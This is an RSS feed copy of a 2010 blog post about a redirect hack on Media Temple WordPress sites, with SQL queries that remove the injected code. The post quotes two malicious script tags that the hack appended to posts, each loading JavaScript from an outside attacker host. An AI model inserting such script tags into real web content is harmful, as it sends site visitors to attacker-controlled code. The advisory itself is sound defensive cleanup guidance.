Digging into WordPress » hack http://digwp.com Take your WordPress skills to the next level. Fri, 18 May 2012 18:21:22 +0000 en hourly 1 http://wordpress.org/?v=3.3.2 Media Temple WordPress Hack http://digwp.com/2010/07/media-temple-wordpress-hack/ http://digwp.com/2010/07/media-temple-wordpress-hack/#comments Sat, 17 Jul 2010 15:38:15 +0000 Jeff Starr http://digwp.com/?p=2547 It looks like Media Temple WordPress installs have been hit with a WordPress Redirect Exploit. We got hit here at DigWP.com, but have cleaned things up and are taking steps to prevent it from happening again. Here is what Media Temple knows so far:

  • Visitors viewing posts on your blog may be redirected to a third-party site.  This may be a site already blocked by Google.
  • Visitors may  also be forwarded to the domain googlesearch.com, which has already been disabled.

They provide steps for clearing things up, but it doesn’t look like the entry-point or source of this hack is known at this point.

The hack injects a short JavaScript string into your database at the end of each your post’s content. There are (so far) two known variations of the inserted garbage:

  • <script src="http://ae.awaue.com/7"></script>
  • <script src="http://ie.eracou.com/3"></script>

To clean this up asap, backup your database and run the following SQL queries:

UPDATE wp_posts SET post_content = replace(post_content, '<script src="http://ae.awaue.com/7"></script>', '');

UPDATE wp_posts SET post_content = replace(post_content, '<script src="http://ie.eracou.com/3"></script>', '');

And remember to change the query prefix from wp_ to your custom prefix.

© 2010 Digging into WordPress | Permalink | 65 comments | Add to del.icio.us | Post tags: , ,

]]> http://digwp.com/2010/07/media-temple-wordpress-hack/feed/ 65